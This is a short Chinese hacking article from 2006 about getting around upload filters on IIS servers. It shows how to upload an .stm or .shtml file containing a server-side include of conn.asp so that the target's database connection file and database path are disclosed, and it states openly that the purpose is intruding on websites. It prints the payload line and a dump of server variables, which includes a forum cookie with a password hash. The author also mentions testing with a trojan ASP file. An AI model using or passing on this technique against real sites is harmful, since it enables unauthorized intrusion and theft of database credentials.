不允許上傳asp,cer,cdx,htr時怎么辦
2006-07-04 賽迪網(wǎng)社區(qū)
利用stm來上傳,還能執(zhí)行程序,代碼:
說保存為stm或者shtml看看,運行如下:
HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash,
application/vnd.ms-powerpoint,
application/vnd.ms-excel, application/msword,
*/* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive
HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)
HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583;
bblastactivity=1100265530; bbuserid=1;
bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f;
ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ
HTTP_ACCEPT_ENCODING:gzip, deflate 當前文件名稱:F:Web1.stm |
Web服務器的名稱和版本:Microsoft-IIS/5.0 主機名:localhost 端口:80 客戶或客戶代理IP地址:127.0.0.1 客戶或客戶代理主機名:127.0.0.1 PATH_INFO 的值,但帶有擴展為某個目錄規(guī)范的虛擬路 徑:F:Web1.stm 客戶端給出附加路徑信息:/1.stm image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Quoted from Unkown: |
當網(wǎng)站不允許上傳asp cer cdx htr等文件時, 上傳一個stm文件, 內(nèi)容為:
<!--#include file="conn.asp"-->
直接請求這個stm文件, conn.asp就一覽無遺, 數(shù)據(jù)庫路徑也就到手啦。 原來就是如上所說的,
<!--#include file="conn.asp"-->
就是一條SSI指令,其作用是將"info.htm"的內(nèi)容拷貝到當前的頁面中,當訪問者來瀏覽時,會看到其它HTML文檔一樣顯示info.htm其中的內(nèi)容。 我在本地試驗成功!在我的iis目錄下建了一個test.stm文件,內(nèi)容為:
<!--#include file="conn.asp"-->
又在同一目錄下放了一個我的一個木馬文件ok.asp在瀏覽器中請求test.stm,沒有什么反映,一片空白。但是一查看源代碼,狂暈,原來就是我的asp文件的內(nèi)容!這樣我們就可以利用這個來獲取要入侵的web的conn文件來獲得數(shù)據(jù)庫路徑,但是一個前提是服務器的對stm或者shtml的擴展沒有刪除!
|
熱詞搜索:
上一篇:路由技術:在SCO UNIX架設簡單路由器
下一篇:打造頂級堅固的“鈦金” 進程防火墻